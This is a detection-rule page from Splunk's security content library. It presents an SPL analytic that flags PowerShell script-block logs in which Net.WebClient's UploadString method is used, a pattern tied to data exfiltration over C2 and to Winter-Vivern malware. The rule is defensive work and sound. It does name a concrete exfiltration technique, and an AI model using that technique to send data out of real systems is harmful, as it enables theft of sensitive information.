← Library
splApache-2.0from splunk/security_content

Windows Exfiltration Over C2 Via Powershell UploadString

The following analytic identifies potential data exfiltration using the PowerShell `net.webclient` command with the `UploadString` method. It leverages PowerShell Script Block Logging to detect instances where this command is executed. This activity is significant as it may indicate an attempt to upload sensitive data, such as desktop screenshots or files, to an external or internal URI, often associated with malware like Winter-Vivern. If confirmed malicious, this could lead to unauthorized data transfer, compromising sensitive information and potentially leading to further exploitation of the compromised host.

Quality
51
FP risk
Forks
0
Views
0
Rule sourcedetections/endpoint/windows_exfiltration_over_c2_via_powershell_uploadstring.yml
`powershell` EventCode=4104 ScriptBlockText = "*Net.webclient*" AND ScriptBlockText = "*.UploadString*"
  | fillnull
  | stats count min(_time) as firstTime max(_time) as lastTime
    BY dest signature signature_id
       user_id vendor_product EventID
       Guid Opcode Name
       Path ProcessID ScriptBlockId
       ScriptBlockText
  | `security_content_ctime(firstTime)`
  | `security_content_ctime(lastTime)`
  | `windows_exfiltration_over_c2_via_powershell_uploadstring_filter`